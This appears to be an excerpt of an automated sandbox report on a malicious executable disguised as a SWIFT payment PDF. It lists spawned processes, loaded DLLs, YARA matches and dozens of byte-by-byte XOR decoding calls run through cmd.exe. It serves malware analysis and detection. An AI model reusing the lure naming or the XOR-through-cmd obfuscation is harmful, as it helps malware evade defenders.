          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: version.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: edgegdi.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: shfolder.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: propsys.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: riched20.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: usp10.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: msls31.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: textinputframework.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: coreuicomponents.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: coremessaging.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: textshaping.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: version.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: edgegdi.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: winmm.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: rstrtmgr.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: ncrypt.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Section loaded: ntasn1.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  File written: C:\Windows\Resources\0409\gashanens.ini

          Data Obfuscation

          barindex
          Source: Yara match  File source: 00000006.00000002.134275655794.00000000085F6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match  File source: 00000006.00000002.134274135976.0000000000863000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match  File source: 00000006.00000002.134274135976.000000000081E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match  File source: Process Memory Space: SWIFTCOPYMT1030000000_pdf.exe PID: 1976, type: MEMORYSTR
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "193^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "193^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
